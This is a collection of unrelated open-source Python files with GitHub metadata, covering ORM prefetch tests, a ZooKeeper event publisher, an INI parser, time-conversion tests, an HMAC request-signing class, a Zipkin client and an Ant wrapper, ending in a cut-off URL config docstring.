def test_4(self):
with db_session:
s1 = Student.select().prefetch(Student.group).first()
g = s1.group
self.assertEqual(g.major, 'Math')
@raises_exception(TypeError, 'Argument of prefetch() query method must be entity class or attribute. Got: 111')
def test_5(self):
with db_session:
Student.select().prefetch(111)
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Group[1].major: the database session is over')
def test_6(self):
with db_session:
name, group = select((s.name, s.group) for s in Student).first()
group.major
def test_7(self):
with db_session:
name, group = select((s.name, s.group) for s in Student).prefetch(Group).first()
self.assertEqual(group.major, 'Math')
@raises_exception(DatabaseSessionIsOver, 'Cannot load collection Student[1].courses: the database session is over')
def test_8(self):
with db_session:
s1 = Student.select().first()
set(s1.courses)
@raises_exception(DatabaseSessionIsOver, 'Cannot load collection Student[1].courses: the database session is over')
def test_9(self):
with db_session:
s1 = Student.select().prefetch(Course).first()
set(s1.courses)
def test_10(self):
with db_session:
s1 = Student.select().prefetch(Student.courses).first()
self.assertEqual(set(s1.courses.name), set(['Math', 'Physics']))
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Student[1].biography: the database session is over')
def test_11(self):
with db_session:
s1 = Student.select().prefetch(Course).first()
s1.biography
def test_12(self):
with db_session:
s1 = Student.select().prefetch(Student.biography).first()
self.assertEqual(s1.biography, 'some text')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e0492197667dac9c61e3fe57c2dde6a4",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 120,
"avg_line_length": 34.72072072072072,
"alnum_prop": 0.6097560975609756,
"repo_name": "compiteing/flask-ponypermission",
"id": "e33f3c97f1fa070dc345be4fdbe795f1f4a3154b",
"size": "3854",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/pony/orm/tests/test_prefetching.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "6267"
},
{
"name": "HTML",
"bytes": "1793"
},
{
"name": "JavaScript",
"bytes": "6187"
},
{
"name": "Python",
"bytes": "4130219"
},
{
"name": "Shell",
"bytes": "3783"
}
],
"symlink_target": ""
} |
"""Process application events."""
from __future__ import absolute_import
import tempfile
import logging
import os
import time
import kazoo.client
import yaml
from . import exc
from . import idirwatch
from . import sysinfo
from . import zkutils
from . import zknamespace as z
_LOGGER = logging.getLogger(__name__)
_SERVERS_ACL = zkutils.make_role_acl('servers', 'rwcd')
_HOSTNAME = sysinfo.hostname()
def post(events_dir, appname, event, message, payload=None):
"""Post application event to event directory."""
_LOGGER.debug('post: %s, %s, %s, %s', events_dir, appname, event, message)
with tempfile.NamedTemporaryFile(dir=events_dir,
delete=False,
prefix='.tmp') as temp:
if isinstance(payload, str):
temp.write(payload)
else:
temp.write(yaml.dump(payload))
if message is None:
message = ''
if str(message).find('\n') != -1:
_LOGGER.error('Invalid payload: %s', message)
return
filename = '%s,%s,%s,%s' % (time.time(), appname, event, message)
os.rename(temp.name, os.path.join(events_dir, filename))
class AppEventsWatcher(object):
"""Publish app events from the queue."""
def __init__(self, zkclient, events_dir):
self.zkclient = zkclient
self.events_dir = events_dir
def run(self):
"""Monitores events directory and publish events."""
watch = idirwatch.DirWatcher(self.events_dir)
watch.on_created = self._on_created
for eventfile in os.listdir(self.events_dir):
filename = os.path.join(self.events_dir, eventfile)
self._on_created(filename)
while True:
if watch.wait_for_events(60):
watch.process_events()
@exc.exit_on_unhandled
def _on_created(self, path):
"""This is the handler function when new files are seen"""
if not os.path.exists(path):
return
localpath = os.path.basename(path)
if localpath.startswith('.'):
return
_LOGGER.info('New event file - %r', path)
eventtime, appname, event, data = localpath.split(',', 4)
with open(path) as f:
eventnode = '%s,%s,%s,%s' % (eventtime, _HOSTNAME, event, data)
_LOGGER.debug('Creating %s', z.path.task(appname, eventnode))
try:
zkutils.with_retry(self.zkclient.create,
z.path.task(appname, eventnode),
f.read(),
acl=[_SERVERS_ACL],
makepath=True)
except kazoo.client.NodeExistsError:
pass
if event in ['aborted', 'killed', 'finished']:
scheduled_node = z.path.scheduled(appname)
_LOGGER.info('Unscheduling, event=%s: %s', event, scheduled_node)
zkutils.with_retry(zkutils.ensure_deleted, self.zkclient,
scheduled_node)
os.unlink(path)
| {
"content_hash": "b3388428ee63953335dca114cb00b034",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 78,
"avg_line_length": 31.21212121212121,
"alnum_prop": 0.5673139158576052,
"repo_name": "toenuff/treadmill",
"id": "d8a758f40dbb7bdabe760b020d86c4a2b2db4d87",
"size": "3090",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/python/treadmill/appevents.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Prolog",
"bytes": "19323"
},
{
"name": "Python",
"bytes": "1511919"
},
{
"name": "Shell",
"bytes": "29014"
}
],
"symlink_target": ""
} |
"""Access and/or modify INI files
* Compatiable with ConfigParser
* Preserves order of sections & options
* Preserves comments/blank lines/etc
* More conveninet access to data
Example:
>>> from StringIO import StringIO
>>> sio = StringIO('''# configure foo-application
... [foo]
... bar1 = qualia
... bar2 = 1977
... [foo-ext]
... special = 1''')
>>> cfg = INIConfig(sio)
>>> print cfg.foo.bar1
qualia
>>> print cfg['foo-ext'].special
1
>>> cfg.foo.newopt = 'hi!'
>>> print cfg
# configure foo-application
[foo]
bar1 = qualia
bar2 = 1977
newopt = hi!
[foo-ext]
special = 1
"""
# An ini parser that supports ordered sections/options
# Also supports updates, while preserving structure
# Backward-compatiable with ConfigParser
try:
set
except NameError:
from sets import Set as set
import re
from ConfigParser import DEFAULTSECT, ParsingError, MissingSectionHeaderError
import config
class LineType(object):
line = None
def __init__(self, line=None):
if line is not None:
self.line = line.strip('\n')
# Return the original line for unmodified objects
# Otherwise construct using the current attribute values
def __str__(self):
if self.line is not None:
return self.line
else:
return self.to_string()
# If an attribute is modified after initialization
# set line to None since it is no longer accurate.
def __setattr__(self, name, value):
if hasattr(self,name):
self.__dict__['line'] = None
self.__dict__[name] = value
def to_string(self):
raise Exception('This method must be overridden in derived classes')
class SectionLine(LineType):
regex = re.compile(r'^\['
r'(?P<name>[^]]+)'
r'\]\s*'
r'((?P<csep>;|#)(?P<comment>.*))?$')
def __init__(self, name, comment=None, comment_separator=None,
comment_offset=-1, line=None):
super(SectionLine, self).__init__(line)
self.name = name
self.comment = comment
self.comment_separator = comment_separator
self.comment_offset = comment_offset
def to_string(self):
out = '[' + self.name + ']'
if self.comment is not None:
# try to preserve indentation of comments
out = (out+' ').ljust(self.comment_offset)
out = out + self.comment_separator + self.comment
return out
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('name'), m.group('comment'),
m.group('csep'), m.start('csep'),
line)
parse = classmethod(parse)
class OptionLine(LineType):
def __init__(self, name, value, separator=' = ', comment=None,
comment_separator=None, comment_offset=-1, line=None):
super(OptionLine, self).__init__(line)
self.name = name
self.value = value
self.separator = separator
self.comment = comment
self.comment_separator = comment_separator
self.comment_offset = comment_offset
def to_string(self):
out = '%s%s%s' % (self.name, self.separator, self.value)
if self.comment is not None:
# try to preserve indentation of comments
out = (out+' ').ljust(self.comment_offset)
out = out + self.comment_separator + self.comment
return out
regex = re.compile(r'^(?P<name>[^:=\s[][^:=]*)'
r'(?P<sep>[:=]\s*)'
r'(?P<value>.*)$')
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
name = m.group('name').rstrip()
value = m.group('value')
sep = m.group('name')[len(name):] + m.group('sep')
# comments are not detected in the regex because
# ensuring total compatibility with ConfigParser
# requires that:
# option = value ;comment // value=='value'
# option = value;1 ;comment // value=='value;1 ;comment'
#
# Doing this in a regex would be complicated. I
# think this is a bug. The whole issue of how to
# include ';' in the value needs to be addressed.
# Also, '#' doesn't mark comments in options...
coff = value.find(';')
if coff != -1 and value[coff-1].isspace():
comment = value[coff+1:]
csep = value[coff]
value = value[:coff].rstrip()
coff = m.start('value') + coff
else:
comment = None
csep = None
coff = -1
return cls(name, value, sep, comment, csep, coff, line)
parse = classmethod(parse)
class CommentLine(LineType):
regex = re.compile(r'^(?P<csep>[;#]|[rR][eE][mM])'
r'(?P<comment>.*)$')
def __init__(self, comment='', separator='#', line=None):
super(CommentLine, self).__init__(line)
self.comment = comment
self.separator = separator
def to_string(self):
return self.separator + self.comment
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('comment'), m.group('csep'), line)
parse = classmethod(parse)
class EmptyLine(LineType):
# could make this a singleton
def to_string(self):
return ''
value = property(lambda _: '')
def parse(cls, line):
if line.strip(): return None
return cls(line)
parse = classmethod(parse)
class ContinuationLine(LineType):
regex = re.compile(r'^\s+(?P<value>.*)$')
def __init__(self, value, value_offset=None, line=None):
super(ContinuationLine, self).__init__(line)
self.value = value
if value_offset is None:
value_offset = 8
self.value_offset = value_offset
def to_string(self):
return ' '*self.value_offset + self.value
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('value'), m.start('value'), line)
parse = classmethod(parse)
class LineContainer(object):
def __init__(self, d=None):
self.contents = []
self.orgvalue = None
if d:
if isinstance(d, list): self.extend(d)
else: self.add(d)
def add(self, x):
self.contents.append(x)
def extend(self, x):
for i in x: self.add(i)
def get_name(self):
return self.contents[0].name
def set_name(self, data):
self.contents[0].name = data
def get_value(self):
if self.orgvalue is not None:
return self.orgvalue
elif len(self.contents) == 1:
return self.contents[0].value
else:
return '\n'.join([('%s' % x.value) for x in self.contents
if not isinstance(x, CommentLine)])
def set_value(self, data):
self.orgvalue = data
lines = ('%s' % data).split('\n')
# If there is an existing ContinuationLine, use its offset
value_offset = None
for v in self.contents:
if isinstance(v, ContinuationLine):
value_offset = v.value_offset
break
# Rebuild contents list, preserving initial OptionLine
self.contents = self.contents[0:1]
self.contents[0].value = lines[0]
del lines[0]
for line in lines:
if line.strip():
self.add(ContinuationLine(line, value_offset))
else:
self.add(EmptyLine())
name = property(get_name, set_name)
value = property(get_value, set_value)
def __str__(self):
s = [x.__str__() for x in self.contents]
return '\n'.join(s)
def finditer(self, key):
for x in self.contents[::-1]:
if hasattr(x, 'name') and x.name==key:
yield x
def find(self, key):
for x in self.finditer(key):
return x
raise KeyError(key)
def _make_xform_property(myattrname, srcattrname=None):
private_attrname = myattrname + 'value'
private_srcname = myattrname + 'source'
if srcattrname is None:
srcattrname = myattrname
def getfn(self):
srcobj = getattr(self, private_srcname)
if srcobj is not None:
return getattr(srcobj, srcattrname)
else:
return getattr(self, private_attrname)
def setfn(self, value):
srcobj = getattr(self, private_srcname)
if srcobj is not None:
setattr(srcobj, srcattrname, value)
else:
setattr(self, private_attrname, value)
return property(getfn, setfn)
class INISection(config.ConfigNamespace):
_lines = None
_options = None
_defaults = None
_optionxformvalue = None
_optionxformsource = None
_compat_skip_empty_lines = set()
def __init__(self, lineobj, defaults = None,
optionxformvalue=None, optionxformsource=None):
self._lines = [lineobj]
self._defaults = defaults
self._optionxformvalue = optionxformvalue
self._optionxformsource = optionxformsource
self._options = {}
_optionxform = _make_xform_property('_optionxform')
def _compat_get(self, key):
# identical to __getitem__ except that _compat_XXX
# is checked for backward-compatible handling
if key == '__name__':
return self._lines[-1].name
if self._optionxform: key = self._optionxform(key)
try:
value = self._options[key].value
del_empty = key in self._compat_skip_empty_lines
except KeyError:
if self._defaults and key in self._defaults._options:
value = self._defaults._options[key].value
del_empty = key in self._defaults._compat_skip_empty_lines
else:
raise
if del_empty:
value = re.sub('\n+', '\n', value)
return value
def __getitem__(self, key):
if key == '__name__':
return self._lines[-1].name
if self._optionxform: key = self._optionxform(key)
try:
return self._options[key].value
except KeyError:
if self._defaults and key in self._defaults._options:
return self._defaults._options[key].value
else:
raise
def __setitem__(self, key, value):
if self._optionxform: xkey = self._optionxform(key)
else: xkey = key
if xkey in self._compat_skip_empty_lines:
self._compat_skip_empty_lines.remove(xkey)
if xkey not in self._options:
# create a dummy object - value may have multiple lines
obj = LineContainer(OptionLine(key, ''))
self._lines[-1].add(obj)
self._options[xkey] = obj
# the set_value() function in LineContainer
# automatically handles multi-line values
self._options[xkey].value = value
def __delitem__(self, key):
if self._optionxform: key = self._optionxform(key)
if key in self._compat_skip_empty_lines:
self._compat_skip_empty_lines.remove(key)
for l in self._lines:
remaining = []
for o in l.contents:
if isinstance(o, LineContainer):
n = o.name
if self._optionxform: n = self._optionxform(n)
if key != n: remaining.append(o)
else:
remaining.append(o)
l.contents = remaining
del self._options[key]
def __iter__(self):
d = set()
for l in self._lines:
for x in l.contents:
if isinstance(x, LineContainer):
if self._optionxform:
ans = self._optionxform(x.name)
else:
ans = x.name
if ans not in d:
yield ans
d.add(ans)
if self._defaults:
for x in self._defaults:
if x not in d:
yield x
d.add(x)
def _new_namespace(self, name):
raise Exception('No sub-sections allowed', name)
def make_comment(line):
return CommentLine(line.rstrip('\n'))
def readline_iterator(f):
"""iterate over a file by only using the file object's readline method"""
have_newline = False
while True:
line = f.readline()
if not line:
if have_newline:
yield ""
return
if line.endswith('\n'):
have_newline = True
else:
have_newline = False
yield line
def lower(x):
return x.lower()
class INIConfig(config.ConfigNamespace):
_data = None
_sections = None
_defaults = None
_optionxformvalue = None
_optionxformsource = None
_sectionxformvalue = None
_sectionxformsource = None
_parse_exc = None
_bom = False
def __init__(self, fp=None, defaults=None, parse_exc=True,
optionxformvalue=lower, optionxformsource=None,
sectionxformvalue=None, sectionxformsource=None):
self._data = LineContainer()
self._parse_exc = parse_exc
self._optionxformvalue = optionxformvalue
self._optionxformsource = optionxformsource
self._sectionxformvalue = sectionxformvalue
self._sectionxformsource = sectionxformsource
self._sections = {}
if defaults is None: defaults = {}
self._defaults = INISection(LineContainer(), optionxformsource=self)
for name, value in defaults.iteritems():
self._defaults[name] = value
if fp is not None:
self._readfp(fp)
_optionxform = _make_xform_property('_optionxform', 'optionxform')
_sectionxform = _make_xform_property('_sectionxform', 'optionxform')
def __getitem__(self, key):
if key == DEFAULTSECT:
return self._defaults
if self._sectionxform: key = self._sectionxform(key)
return self._sections[key]
def __setitem__(self, key, value):
raise Exception('Values must be inside sections', key, value)
def __delitem__(self, key):
if self._sectionxform: key = self._sectionxform(key)
for line in self._sections[key]._lines:
self._data.contents.remove(line)
del self._sections[key]
def __iter__(self):
d = set()
d.add(DEFAULTSECT)
for x in self._data.contents:
if isinstance(x, LineContainer):
if x.name not in d:
yield x.name
d.add(x.name)
def _new_namespace(self, name):
if self._data.contents:
self._data.add(EmptyLine())
obj = LineContainer(SectionLine(name))
self._data.add(obj)
if self._sectionxform: name = self._sectionxform(name)
if name in self._sections:
ns = self._sections[name]
ns._lines.append(obj)
else:
ns = INISection(obj, defaults=self._defaults,
optionxformsource=self)
self._sections[name] = ns
return ns
def __str__(self):
if self._bom:
fmt = u'\ufeff%s'
else:
fmt = '%s'
return fmt % self._data.__str__()
__unicode__ = __str__
_line_types = [EmptyLine, CommentLine,
SectionLine, OptionLine,
ContinuationLine]
def _parse(self, line):
for linetype in self._line_types:
lineobj = linetype.parse(line)
if lineobj:
return lineobj
else:
# can't parse line
return None
def _readfp(self, fp):
cur_section = None
cur_option = None
cur_section_name = None
cur_option_name = None
pending_lines = []
pending_empty_lines = False
try:
fname = fp.name
except AttributeError:
fname = '<???>'
linecount = 0
exc = None
line = None
for line in readline_iterator(fp):
# Check for BOM on first line
if linecount == 0 and isinstance(line, unicode):
if line[0] == u'\ufeff':
line = line[1:]
self._bom = True
lineobj = self._parse(line)
linecount += 1
if not cur_section and not isinstance(lineobj,
(CommentLine, EmptyLine, SectionLine)):
if self._parse_exc:
raise MissingSectionHeaderError(fname, linecount, line)
else:
lineobj = make_comment(line)
if lineobj is None:
if self._parse_exc:
if exc is None: exc = ParsingError(fname)
exc.append(linecount, line)
lineobj = make_comment(line)
if isinstance(lineobj, ContinuationLine):
if cur_option:
if pending_lines:
cur_option.extend(pending_lines)
pending_lines = []
if pending_empty_lines:
optobj._compat_skip_empty_lines.add(cur_option_name)
pending_empty_lines = False
cur_option.add(lineobj)
else:
# illegal continuation line - convert to comment
if self._parse_exc:
if exc is None: exc = ParsingError(fname)
exc.append(linecount, line)
lineobj = make_comment(line)
if isinstance(lineobj, OptionLine):
if pending_lines:
cur_section.extend(pending_lines)
pending_lines = []
pending_empty_lines = False
cur_option = LineContainer(lineobj)
cur_section.add(cur_option)
if self._optionxform:
cur_option_name = self._optionxform(cur_option.name)
else:
cur_option_name = cur_option.name
if cur_section_name == DEFAULTSECT:
optobj = self._defaults
else:
optobj = self._sections[cur_section_name]
optobj._options[cur_option_name] = cur_option
if isinstance(lineobj, SectionLine):
self._data.extend(pending_lines)
pending_lines = []
pending_empty_lines = False
cur_section = LineContainer(lineobj)
self._data.add(cur_section)
cur_option = None
cur_option_name = None
if cur_section.name == DEFAULTSECT:
self._defaults._lines.append(cur_section)
cur_section_name = DEFAULTSECT
else:
if self._sectionxform:
cur_section_name = self._sectionxform(cur_section.name)
else:
cur_section_name = cur_section.name
if cur_section_name not in self._sections:
self._sections[cur_section_name] = \
INISection(cur_section, defaults=self._defaults,
optionxformsource=self)
else:
self._sections[cur_section_name]._lines.append(cur_section)
if isinstance(lineobj, (CommentLine, EmptyLine)):
pending_lines.append(lineobj)
if isinstance(lineobj, EmptyLine):
pending_empty_lines = True
self._data.extend(pending_lines)
if line and line[-1]=='\n':
self._data.add(EmptyLine())
if exc:
raise exc
| {
"content_hash": "38e1d5c9529d5bbff6bbdd7a3e22f51c",
"timestamp": "",
"source": "github",
"line_count": 634,
"max_line_length": 83,
"avg_line_length": 32.09305993690852,
"alnum_prop": 0.5350665945839681,
"repo_name": "m00dawg/holland",
"id": "56f4c30768d01eddaf1d11428692d5a4c8313260",
"size": "20347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/holland.backup.mysqldump/holland/backup/mysqldump/util/ini.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "7884"
},
{
"name": "Python",
"bytes": "1720427"
},
{
"name": "Roff",
"bytes": "3761"
},
{
"name": "Shell",
"bytes": "5001"
}
],
"symlink_target": ""
} |
__revision__ = "$Id: test_Acspy_Common_TimeHelper.py,v 1.1.1.1 2012/03/07 17:40:45 acaproni Exp $"
#--REGULAR IMPORTS-------------------------------------------------------------
import unittest
import time
import acstime
#--ACS IMPORTS____-------------------------------------------------------------
import Acspy.Common.TimeHelper as TimeHelper
#------------------------------------------------------------------------------
def fixedTime():
return 1207768989.9850370
class GetTimeStampCheck(unittest.TestCase):
"""Test that the getTimeStamp function is working correctly."""
def setUp(self):
self.savetime = time.time
time.time = fixedTime
def tearDown(self):
time.time = self.savetime
def testKnownDate(self):
'''getTimeStamp reports correct ACS timestamp for a known value'''
rtn = TimeHelper.getTimeStamp()
self.assertEqual(True, isinstance(rtn, acstime.Epoch))
self.assertEqual(134270617899850370L, rtn.value)
class TimeUtilCheck(unittest.TestCase):
"""Test that the TimeUtil class works correctly."""
def setUp(self):
self.th = TimeHelper.TimeUtil()
pass
def tearDown(self):
pass
def testPy2EpochEpoch(self):
'''TimeUtil.py2epoch handles Python epoch correctly'''
rtn = self.th.py2epoch(0)
self.assertEqual(True, isinstance(rtn, acstime.Epoch))
self.assertEqual(acstime.ACE_BEGIN, rtn.value)
def testPy2EpochNegative(self):
'''TimeUtil.py2epoch handles negative values correctly '''
rtn = self.th.py2epoch(-1)
self.assertEqual(10000000L, acstime.ACE_BEGIN - rtn.value)
def testPy2EpochACSEpoch(self):
'''TimeUtil.py2epoch handles ACS epoch correctly '''
rtn = self.th.py2epoch(-acstime.ACE_BEGIN / 10000000L)
self.assertEqual(0, rtn.value)
def testEpoch2PyEpoch(self):
'''TimeUtil.epoch2py handles ACS epoch correctly'''
rtn = self.th.epoch2py(acstime.Epoch(0))
self.assertEqual(True, isinstance(rtn, long))
self.assertEqual(-acstime.ACE_BEGIN / 10000000L, rtn)
def testEpoch2PyPyEpoch(self):
'''TimeUtil.epoch2py handles Python epoch correctly'''
rtn = self.th.epoch2py(acstime.Epoch(acstime.ACE_BEGIN))
self.assertEqual(0L, rtn)
def testEpoch2PyNegative(self):
'''TimeUtil.epoch2py handles negative values correctly '''
rtn = self.th.epoch2py(acstime.Epoch(acstime.ACE_BEGIN - 10000000L))
self.assertEqual(-1L, rtn)
pass
def testEpoch2PyLong(self):
'''TimeUtil.epoch2py handles long values correctly '''
rtn = self.th.epoch2py(long(acstime.ACE_BEGIN))
self.assertEqual(0L, rtn)
def testPy2DurationZero(self):
'''TimeUtil.py2duration handles 0 value correctly'''
rtn = self.th.py2duration(0)
self.assertEqual(True, isinstance(rtn, acstime.Duration))
self.assertEqual(0, rtn.value)
def testPy2DurationNegative(self):
'''TimeUtil.py2duration handles negative values correctly '''
rtn = self.th.py2duration(-1)
self.assertEqual(-10000000L, rtn.value)
def testDuration2PyZero(self):
'''TimeUtil.duration2py handles 0 value correctly'''
rtn = self.th.duration2py(acstime.Duration(0))
self.assertEqual(True, isinstance(rtn, long))
self.assertEqual(0, rtn)
def testDuration2PyNegative(self):
'''TimeUtil.duration2py handles negative values correctly '''
rtn = self.th.duration2py(acstime.Duration(-1))
self.assertEqual(-1, rtn)
def testDuration2PyLong(self):
'''TimeUtil.duration2py handles long values correctly '''
rtn = self.th.duration2py(0L)
self.assertEqual(0L, rtn)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(GetTimeStampCheck))
suite.addTest(unittest.makeSuite(TimeUtilCheck))
return suite
if __name__ == "__main__":
unittest.main(defaultTest='suite')
#
# ___oOo___
| {
"content_hash": "f72d484c9c5d9f21ad29c9666affef18",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 98,
"avg_line_length": 34.58119658119658,
"alnum_prop": 0.634206623826001,
"repo_name": "csrg-utfsm/acscb",
"id": "eaec642161f800698ef2655eb753f5b68ed4a452",
"size": "5268",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acspycommon/test/test_Acspy_Common_TimeHelper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
from wsgiref.handlers import format_date_time
from six.moves.urllib.parse import urlparse
from requests.auth import AuthBase
from datetime import datetime
import six
import time
import hmac
import base64
import hashlib
import logging
log = logging.getLogger('bigstash.sign')
class Light_HTTPSignatureAuth(AuthBase):
def __init__(self, key_id='', secret='', algorithm='rsa-sha256',
headers=None, allow_agent=False):
self.algorithm = algorithm
self.key_id = key_id
self.secret = six.b(secret)
self.headers = headers
self.signature_string_head = self.build_header_content()
def build_header_content(self):
param_map = {'keyId': 'hmac-key-1',
'algorithm': self.algorithm,
'signature': '%s'}
if self.headers:
param_map['headers'] = ' '.join(self.headers)
kv = map('{0[0]}="{0[1]}"'.format, param_map.items())
kv_string = ','.join(kv)
sig_string = 'Signature {0}'.format(kv_string)
return sig_string
def hmac_sha256(self, data):
return hmac.new(self.secret, data, digestmod=hashlib.sha256).digest()
def sign(self, data):
try:
signer = getattr(self, self.algorithm.replace('-', '_'))
except AttributeError:
raise NotImplemented(
"algorithm {} not implemented".format(self.algorithm))
return base64.b64encode(signer(data.encode('utf-8'))).decode('ascii')
def __call__(self, r):
url_parts = urlparse(r.url)
if 'Date' not in r.headers:
now = datetime.now()
stamp = time.mktime(now.timetuple())
r.headers['Date'] = format_date_time(stamp)
if self.headers:
signable_list = []
for x in self.headers:
if x in r.headers:
signable_list.append("%s: %s" % (x, r.headers[x]))
elif x == '(request-target)':
signable_list.append(
"%s: %s %s" % (
x,
r.method.lower(),
url_parts.path if not url_parts.query else '%s?%s' % (url_parts.path, url_parts.query)))
elif x == 'host':
signable_list.append("%s: %s" % (x, url_parts.netloc))
signable = '\n'.join(signable_list)
else:
signable = r.headers['Date']
log.debug("data to sign: \n{}".format(signable))
signature = self.sign(signable)
r.headers['Authorization'] = self.signature_string_head % signature
return r
HTTPSignatureAuth = Light_HTTPSignatureAuth
| {
"content_hash": "1daaaced6e1c12c55e19e058ead8a9db",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 116,
"avg_line_length": 36.58108108108108,
"alnum_prop": 0.5526413003324714,
"repo_name": "longaccess/bigstash-python",
"id": "27751f0324663289f1b17d866976005eed119ca0",
"size": "2707",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "BigStash/sign.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "13821"
},
{
"name": "Makefile",
"bytes": "401"
},
{
"name": "Python",
"bytes": "107365"
}
],
"symlink_target": ""
} |
from scribe_client import ScribeClient
from trace import Annotation, Trace, Endpoint
from collections import defaultdict
from formatters import base64_thrift_formatter
class ZipkinClient(ScribeClient):
DEFAULT_END_ANNOTATIONS = ("ss", "cr", "end")
def __init__(self, port, host):
super(ZipkinClient, self).__init__(port, host)
self._annotations_for_trace = defaultdict(list)
def create_trace(self, event):
service = event["trace_name"]
trace_id = event["trace_id"]
span_id = event["span_id"]
parent_span = event["parent_span_id"]
if parent_span == 0:
parent_span = None
trace = Trace(service, trace_id, span_id, parent_span)
return trace
def create_annotation(self, event, kind):
if kind == "keyval_string":
key = event["key"]
val = event["val"]
annotation = Annotation.string(key, val)
elif kind == "keyval_integer":
key = event["key"]
val = str(event["val"])
annotation = Annotation.string(key, val)
elif kind == "timestamp":
timestamp = event.timestamp
#timestamp has different digit length
timestamp = str(timestamp)
timestamp = timestamp[:-3]
event_name = event["event"]
annotation = Annotation.timestamp(event_name, int(timestamp))
# create and set endpoint
port = event["port_no"]
service = event["service_name"]
ip = event["ip"]
endpoint = Endpoint(ip, int(port), service)
annotation.endpoint = endpoint
print annotation
return annotation
def record(self, trace, annotation):
self.scribe_log(trace, [annotation])
'''
trace_key = (trace.trace_id, trace.span_id)
self._annotations_for_trace[trace_key].append(annotation)
if (annotation.name in self.DEFAULT_END_ANNOTATIONS):
saved_annotations = self._annotations_for_trace[trace_key]
del self._annotations_for_trace[trace_key]
self.scribe_log(trace, saved_annotations)
print "Record event"
'''
def scribe_log(self, trace, annotations):
trace._endpoint = None
message = base64_thrift_formatter(trace, annotations)
category = 'zipkin'
return self.log(category, message)
| {
"content_hash": "75378d7e8d3a896175618c7bafc220b2",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 73,
"avg_line_length": 34.970588235294116,
"alnum_prop": 0.605130361648444,
"repo_name": "linuxbox2/blkin",
"id": "28118facb4c39d8256ff4b4de175cbb167f46873",
"size": "2397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "babeltrace-plugins/zipkin/src/zipkin_logic/zipkin_client.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "29710"
},
{
"name": "C++",
"bytes": "16595"
},
{
"name": "CMake",
"bytes": "3278"
},
{
"name": "Makefile",
"bytes": "4645"
},
{
"name": "Python",
"bytes": "15112"
}
],
"symlink_target": ""
} |
"""An Ant wrapper that suppresses useless Ant output.
Ant build scripts output "BUILD SUCCESSFUL" and build timing at the end of
every build. In the Android build, this just adds a lot of useless noise to the
build output. This script forwards its arguments to ant, and prints Ant's
output up until the BUILD SUCCESSFUL line.
"""
import sys
from util import build_utils
def main(argv):
stdout = build_utils.CheckCallDie(['ant'] + argv[1:], suppress_output=True)
stdout = stdout.decode("utf-8").strip().split('\n')
for line in stdout:
if line.strip() == 'BUILD SUCCESSFUL':
break
print(line)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| {
"content_hash": "208fce9505e1fd841d2163921046cb62",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 79,
"avg_line_length": 28,
"alnum_prop": 0.7023809523809523,
"repo_name": "shaochangbin/crosswalk",
"id": "6eca4fc0c6483a2b6c80e32c9156a8db9907abb0",
"size": "883",
"binary": false,
"copies": "1",
"ref": "refs/heads/background",
"path": "app/tools/android/gyp/ant.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "33431"
},
{
"name": "C++",
"bytes": "1069103"
},
{
"name": "Java",
"bytes": "460942"
},
{
"name": "JavaScript",
"bytes": "31135"
},
{
"name": "Objective-C",
"bytes": "17375"
},
{
"name": "Python",
"bytes": "148723"
},
{
"name": "Shell",
"bytes": "5182"
}
],
"symlink_target": ""
} |
"""Test URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
